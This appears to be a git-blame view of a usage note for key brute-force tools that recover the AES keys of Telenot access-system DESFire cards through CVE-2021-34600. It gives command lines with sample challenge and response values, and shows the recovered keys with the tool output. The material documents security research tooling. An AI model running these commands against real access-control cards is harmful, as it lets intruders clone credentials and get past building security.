2022-01-27 02:57:10 +08:00
|
|
|
# AUTH AES
|
|
|
|
#
|
|
|
|
# blog: https://x41-dsec.de/lab/blog/telenot-complex-insecure-keygen/
|
|
|
|
#
|
|
|
|
# Recover the AES key for Telenot Access system's desfire cards.
|
|
|
|
# CVE-2021-34600
|
|
|
|
#
|
|
|
|
# Finds the UNIX timestamp an AES key created with compasX version older than 32.0 has been generated.
|
|
|
|
# Will not work on access tokens afterwards.
|
|
|
|
#
|
|
|
|
|
|
|
|
|
|
|
|
# Unix time stamp 2006-01-01
|
|
|
|
1136073600
|
|
|
|
|
|
|
|
# reader challenge
|
|
|
|
3fda933e2953ca5e6cfbbf95d1b51ddf
|
|
|
|
|
|
|
|
# tag resp, challenge
|
|
|
|
97fe4b5de24188458d102959b888938c988e96fb98469ce7426f50f108eaa583
|
|
|
|
|
|
|
|
|
|
|
|
#
|
|
|
|
# Original source code by authors
|
|
|
|
#
|
|
|
|
|
|
|
|
# simple
|
|
|
|
./brute_key 1605394800 bb6aea729414a5b1eff7b16328ce37fd 82f5f498dbc29f7570102397a2e5ef2b6dc14a864f665b3c54d11765af81e95c
|
|
|
|
|
|
|
|
# complex
|
|
|
|
./brute_key 1136073600 3fda933e2953ca5e6cfbbf95d1b51ddf 97fe4b5de24188458d102959b888938c988e96fb98469ce7426f50f108eaa583
|
|
|
|
|
|
|
|
|
|
|
|
#
|
|
|
|
# Multi threaded version (Iceman)
|
|
|
|
#
|
|
|
|
|
|
|
|
# simple
|
|
|
|
./mfd_aes_brute 1605394800 bb6aea729414a5b1eff7b16328ce37fd 82f5f498dbc29f7570102397a2e5ef2b6dc14a864f665b3c54d11765af81e95c
|
|
|
|
|
|
|
|
expected result:
|
|
|
|
261c07a23f2bc8262f69f10a5bdf3764
|
|
|
|
|
|
|
|
|
2023-08-09 20:30:07 +08:00
|
|
|
Bruteforce using 8 threads
|
|
|
|
Found timestamp........ 1631100305 ( '2021-09-08 13:25:05' )
|
|
|
|
key.................... 261c07a23f2bc8262f69f10a5bdf3764
|
|
|
|
execution time 1.00 sec
|
2022-01-27 02:57:10 +08:00
|
|
|
|
|
|
|
#
|
|
|
|
# complex
|
|
|
|
./mfd_aes_brute 1136073600 3fda933e2953ca5e6cfbbf95d1b51ddf 97fe4b5de24188458d102959b888938c988e96fb98469ce7426f50f108eaa583
|
|
|
|
|
|
|
|
expected result:
|
|
|
|
e757178e13516a4f3171bc6ea85e165a
|
|
|
|
|
|
|
|
|
2023-08-09 20:30:07 +08:00
|
|
|
Bruteforce using 8 threads
|
|
|
|
Found timestamp........ 1606834416 ( '2020-12-01 15:53:36' )
|
|
|
|
key.................... e757178e13516a4f3171bc6ea85e165a
|
|
|
|
execution time 18.54 sec
|
2022-01-27 02:57:10 +08:00
|
|
|
|